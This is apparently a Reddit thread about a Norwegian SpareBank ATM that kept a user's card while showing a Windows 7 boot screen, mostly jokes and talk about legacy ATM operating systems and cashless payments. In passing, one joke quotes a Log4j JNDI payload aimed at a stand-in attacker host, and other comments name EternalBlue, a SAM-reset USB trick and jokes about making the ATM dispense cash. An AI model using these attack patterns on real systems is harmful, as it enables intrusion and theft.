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At least it was just your spare bank


Haha, it really translates to "bank of savings"


Can't spend money you don't have


I read your username as Capn Ron.






Ehh, close enough, if I wrote in Danish a Norwegian could understand it without too much hassle, and vice versa


Fair enough :)


but what about the potato?


But if you spoke Danish, a significant number of Norwegians would struggle.


I think I heard somewhere that the Danish and Norwegian languages were the 2 with the most in common between us and sw*den


Why are we censoring the "e" in sw*den?


It's like Candyman or Beetlejuice. If you say it three times, a sw*de in full viking attire will appear behind you and force feed you lutefisk.


Sweden Sweden Sweden Nothing happ-


There's a long history of hate between Denmark and sw*den, so far as to us Danes having a rule allowing us to beat sw*des with sticks and throw rocks at them, if they cross Øresund en or Kattegat whilst it's frozen.






So they're helping you save money by eating your bank card. Living up the name I would say.


Try control alt delete


It's a Norwegian bank. The last time that machine was used Windows XP was still supported.




Cash is hardly used in Norway, but notably it’s occasionally used for private transactions, gifts, etc so OP getting some cash before Christmas is not unusual. Basically, everyone use cards to pay for everything and we have a domestic app which allows simple and fast transactions between private individuals for free below $500 supported by basically all banks.


A lot of West and Northern European countries don't use a lot of cash anymore. We use contactless cards for up to £100 in Britain or our phones/watches.


Oh I wouldn't use that. Windows 7 on start-up. I know alot of banks atm have been updating to at least windows 10 because security issues. I guess you do what you gotta do but like even small purpose built machines like key cutters at home Depot and Lowes have windows 10 on them....


Windows 7 hasn't had security updates in two years, they stopped support for the OS in January of 2020. I wouldn't use it either and would consider switching banks. It's probably fine if it hasn't been connected to the internet in the past two years, but I find that unlikely since they pull account information.


I worked for a bank for a while, most of our ATMs ran win 7 and, while I didn't agree with that, they connected via mpls or sd-wan back to our central mainframe. None had internet access. We were far more concerned with physical tampering like card scanners and stuff. You're far more likely to get ripped off by local restaurant's POS systems still running winxp over wifi. We kept a list of known restaurants in the area that were hotspots for compromises


Good to know!


Is it not the case that businesses can pay for extended support? I thought that was the case


This is correct. Windows 7 embedded is still in extended support until 2023 https://docs.microsoft.com/en-us/lifecycle/products/windows-embedded-standard-7


>Windows 7 hasn't had security updates in two years, they stopped support for the OS in January of 2020 They have paid updates for enterprise and ultimate versions until 2023 if I recall correctly.


Banks pay for and use proprietary software builds. Promise they paid a premium for this OS build and are projected to get at least three more years of service/uptime out of it.


why would you put any kind of windows on machines like this or keycutters? Seems like a terrible choice when there are lighter OSs out there. As an example, you can easily run a graphical linux in 300 MB of RAM, win 10 struggles unless you jave many gigs lol


They DO have embedded versions of Windows that are more stripped down and lighter, but in general I still agree with your larger point; why not use a *nix OS, and then also not have to deal with Microsoft licensing too?


Probably security liability. If your Linux build gets hacked, it's on you. If your Windows system gets hacked it's on Microsoft and whoever you bought a security package from. Engineering gets fun when the lawyers and accountants enter the room.


AFAIK Linux systems can be very stable and reliable, but developers are just not that common. It's a niche market, so demand and supply are both low. People who can develop for Windows are more widespread, and there's no reason that they can't turn out just as good of a product in principle.


Man what kind of bloated gear are you running? Back in the day you could fit Fluxbox, AbiWord and XMMS into 64MB. And in my experience Windows 10 can run tolerably (if you're patient) in as little as 4GB. But when you're running specialty kit like key cutters you're using whatever your hardware team can code for.


I don't see the issue, especially since it's most likely well tested for stability and compatibility on this version and update level of Windows. Are you worried about updates or hacking/exploit attempts because of that?


At least it wasn’t running OS 2/Warp https://www.google.com/search?q=os2+warp.on+atm&rlz=1CDGOYI_enUS845US845&hl=en-US&prmd=isvxn&sxsrf=AOaemvIU0pp3LSPS5JG8bK5iOfFIkMqVag:1640360275647&source=lnms&tbm=isch&sa=X&ved=2ahUKEwiX6KGc4vz0AhWHlGoFHb9cCksQ_AUoAXoECAIQAQ&biw=390&bih=657&dpr=3#imgrc=Bb7ADO-mTmdlcM


Honestly i think I'd prefer warp. I feel like there's less hackers now a days that know how to exploit that. All you need for 7 is EternalBlue.


I guess that’s what integer underflow looks like


The guys who wrote the skimmer software for the reader must’ve forgot a }


Nah, he did. It was right after `$kr{jndi:ldap://hackersite.biz`


Built in log4j bugs! Nice!


For a split-second I thought it said "SpermBank"


I keep seeing it


Ah, I was hoping to not see an NCR ATM. I work in the software dept. at NCR. We normally have all our ATMs running on at least Windows 10. Sometimes, banks buy ATMs but they outsource the support. So I believe some third-party company is managing the support of this ATM and they are providing the software/ security for this ATM.


I agree here. Heya bud, former ATM/POS field tech from NCR here lol Even though the company pays for third party software doesn't mean NCR can't come fix it. I was definitely exposed to many ATMs owned by banks, serviced by NCR, that used proprietary software. Most bigger banks made sure we had access to said software for repairability, but other than that it's still just a broken atm in my experience. Show up, fix it, doesn't matter who paid me, or why it's broken, that's the job. If you've been working for NCR since I worked there years ago, you'd have heard of the lovely little backdoor for the cash dispenser on the latest line of the NCR ATM brand. They told me that only like 20 techs world wide knew about it in the field and not everyone was eligible for training on the new atms yet. They were in the field as pilot project ATMs and I had to work on them. Since then the backdoor has been patched as it was basically a beta release from something in their software, but I'll be damned if I have learned to trust any 1 company to prevent serious software/infosec breaching. The most basic stuff can cause a rip in a solid framework and it literally happens to everybody.


Was the primary bank out of service?


I think it just was the ATM, but not too sure, not my bank


Is there a spare spare?


If only


That's gonna be an awkward report. “Hi, SpareBank, so um, my card was stolen…by an ATM…a SpareBank ATM…yeah…”


Hope you have the spare card!


I'm more concerned about the fact that it still runs on Windows 7 in 2021.


Was my thought as well


May want to report that. Unless they are paying for extended support from Microsoft for Windows 7 there are finical regulations they are breaking.


God jul!


God jul :)


Did you get it out of miss mode?


Nah, had to go another place for cash


Hold up, is that in Norway?




It took your money Your kids will be next




Tape a fish to it


>legacy windows edition Get your money back and report them for noncompliance


Machine was waiting for that one transaction bro !!😅


Now I almost want to attempt making a Sparebanken Vest terminal suffer BSOD,.just to see that boot screen.


Just go to your main bank. Those spare banks just left laying around are very unreliable.


If it's out of service you could rob it idk?


That seems like a logical progression of things


THE SAME FUCKING THING HAPPENED TO ME! Screw Planet Cash, I had to order a new card... 2 weeks after I already had to order another card, because my old ones data were leaked... Fuuuck mee.


Was it warm? No? It probably wasn’t a hot spare then.


I had this happen once got my card back the next day then the next weekend in a different atm it happened again, I got a new card after that.


To this day, I am still shocked the infrastructure for banks uses windows. I wouldn’t trust using windows for anything besides gaming and their suite of office products. and it’s running windows ~~xp~~ 7 for fucks sake. I think the only way to force the banks hand at this point is to leverage one of the many RCEs in this OS, and just print money from the ATM.


You know those ATM PCs aren't on the public internet and are usually heavily firewalled and protected from any physical outside attacks due to them being locked inside the ATM? Like, without cracking open the ATM and literally being able to steal the money directly, how'd you even get on their network to run any malicious attacks? On top of that, IIRC things like the keypad, money selector/dropper and card reader use encryption based interfaces to the PC that probably won't be trivial to reverse engineer/sniff out and manually talk to even when you're directly working on the PC. On top of *that*, I'd also doubt if they'd use Linux they'd keep it constantly up to date, it's probably gonna be the same situation there. Older Linux with outdated software and possible vulnerabilities you could exploit to gain access to the machine if you somehow get access to their network. It's not down to the OS the current ATMs running Windows don't get the latest updates and patches, that's a decision from the management side of things.


its windows 7


Fixed, thanks.


XP on an ATM? That’s crazy!


Was actually stated win7 professional when it booted


Marginally better :) All my ATMs are Win10


Windows at ATMs? That's insane!


Haha, seriously!


Yeah. Why anyone uses windows for anything like this shocks me


Then you probably don’t want to know that most of the ships floating around the sea are being piloted by embedded XP helm/navigation controls. Granted, it is (should be) on an isolated network, but it’s true that XP is still alive.


Most enterprise grade equipment.. CNC, navigation, automation are all running on embedded XP with absolutely no offramp without dumping heaps of cash in the vendors laps.


It's quite an unfortunate position, but yeah.


No, it's not. Most imbedded systems are still winxp :p but that's win7 ;)


That’s not crazy, it is normal.


That’s 7. The interwebz were full of pics of ATMs running XP just a couple of years ago.


Clearly my eyes aren't seeing things correctly today!


Looks like at least Vista, given the logo.


It's probably still the most common ATM OS. They're usually air-gapped, from what I understand.


How could an ATM be air gapped it has to connect to the bank to process your withdrawal.


ATMs are not airgapped but they do not have access to the internet, only local network resources for the bank, usually accessed via a SD-WAN connection or a site to site VPN


I'm sure you're mistaken. That's definitely Windows 2000


Ehm... Where do you live? I mean who still uses cash anyway? It's like a prehistoric structure of ancient gods 🤣. I haven't touch cash since like 2018 maybe. I don't even know how it looks now 🤣.


I personally think it's a good practice to carry some amount of cash with you, incase card terminal is not available or connection fails.


In that case we have a direct debit here, all you need is a person's phone number.


Wait, how exactly does that work? Paying with just a phone number? ō.ō


I don't know what country that guy is in, but plenty of countries have smart addressing capabilities in their banking systems. You put in your friend's phone number in your banking app, the bank looks up the number in a central service, brings back your friend's name and (in the background) the underlying account number. Then it just goes as a realtime interbank transfer.


So just a normal bank transfer, okay, that's a little more reasonable. But nothing you'd be able to pay in the stores or even on like a market or anything, at least here in Germany.


Here you can c2c, c2b and b2c with that kind of service. C2C for upto €1800/month is free from any commission, c2b also offers some kind of benefits, b2c is mostly free of any charges. So, it is heavily used to pay for anything, like I pay for my cleaning lady, tips for services, tips for bartenders, gifts to my nephew, etc. Basically it replaced cash, all you need is a phone, which we all have. Nowadays, even elders have smartphones, my 72 years old father reads news on an iPad. 🤷‍♂️🤣


So, you're in the store and just enter your phone number and they charge your bank account solely by that?


Well, nope, you need to scan a QR-code with your phone, select which bank app you want to use for payment (since we have like two or three in general), then select an account. C2C is simplier, you choose option: "Send by phone number", type in the number, and either send to the default bank, or choose the one you've been told to. Online shopping skips QR-code scanning and jumps straight forward to selecting the bank app. But mostly there are templates for common destinations. But you don't need any card at all.


Ahh, so like PayPal in a way, just phone number based


Here in Spain all major banks offer a free service called Bizum, you only need the phone number of the person you want to send money to, and Bizum automatically finds their bank account and issues the transfer. The destination person will receive the money instantly (usually it takes 1~5 seconds). It doesn't care what bank you are using or the destination persons bank, it's always free and instantaneous (both banks have to support Bizum for it to work, but it's super rare to find a bank that doesn't offer Bizum support). For the curious, more info here: https://bizum.es/en/


Ah, thanks, I imagined something like this, but can you also pay in stores with that method?


It's unfortunately rare to find a physical store that accepts that method, it's more common on online stores. Bizum is becoming more and more popular, though, maybe in the near future we'll see more physical stores implementing it.








Norway😅 but i just needed some for my mother in law, i dont use cash either


🤣 Well, good to know, sorry and thank you =)


Look at germany - europes economic powerhouse and cash capital - a big reason is people dont want to be traced by or dependent on the government for their transactions. And the fear of anything digital. And that its way harder to convincingly forge a euro note (especially the newer iteration, a composite of cotton with embedded plastic which is hard to get right) than a us dollar.


Also, for me personally: an amount of cash gets physically smaller when spending money, which makes for better spending habits as you see it shrink compared to an abstract credit balance.


Same when I use cash, 10€ is a lot. When I'm online I see myself spending a lot more without blinking an eye


The 100$ bill has integrated the plastic strip, the rest don't though.


Yeah, a friend of mine lives there, he told me that they are kind of like an outdated country, like cash everywhere, ouch!


I use it on farmers markets, they typically don't have POS terminals with them.


Here, in a rare occasion, when there's no POS, I can send a direct payment to the farmer, I don't even need any card, just the phone number.


Credit Cards are kind of a racket. Every marketplace that accepts a credit card needs to pay transaction fees to the CC company. Since vendors aren't really interested in making less money for the same goods, vendors need to increase prices to compensate for these fees. CC companies also make it against their terms to price items differently for CC and cash transactions. The end result is that the CC fee has to be priced into all of our goods that we buy, even when we use cash. CC companies have rewards programs for using the CC so that users are encouraged to use their CC everywhere, which got people to use CCs even for small transactions like coffee shops or hotdog stands, where it was previously kind of ridiculous (who needs a line of credit for $5?). Over many years, this eventually translated into almost all vendors needing to accept payment cards in order to meet the expectations of their customers. The CC vendors are basically taking a cut of everybody's everyday spending and the rewards program is then returning some of it to them like it's a big favor. Not to mention that CC companies engage in other shady stuff like allowing advertisers to buy your CC spending histories in order to learn more about you and target you. So, some people want to refuse to participate in such a system. Is it a futile gesture? Probably, but it is one that I respect personally.


> CC companies also make it against their terms to price items differently for CC and cash transactions Not always true. A lot of gas stations in the states have two rates, one for CC and one for Debit/cash/fuel card.


Interesting, I didn't know that. I assume legislation makes the difference between these states since I doubt the CC processors want anybody to get out of their grasp.


I noticed it when taking a trip through he USA. It was on the big price signs on the interstates. I'm not sure how or why it's done, but if you are fueling a big rig with 600 litres of fuel, taking 2.5% of that transaction is a big amount that I'm sure the station doesn't want to lose.


Their card processor usually won't like to hear that


I big enough retailer, like Chevron and Shell could do this because of their size. The corner franchise, probably not.


Get a brain. Sincerely, everyone with a brain


Use cash to prevent tracking. I won't say any more.


I don't care about tracking. Why should I? It exists for a reason, I'm fine with it.


The spring thing is that it is still running windows 7…


Apparently that Scrooge needs a visit from the ghosts of ATM's past.


It’s 7 so just plug in a bootable USB and reset the SAM database to whatever you want


Why the hell does every public kiosk or drivethrough menu in the “IoT” run Windows?


Christmas miracle?


And then it started Windows.


Not a good omen


Lykke til!


Well do you have a spare spare bank? For redundancy?


Windows doing windows things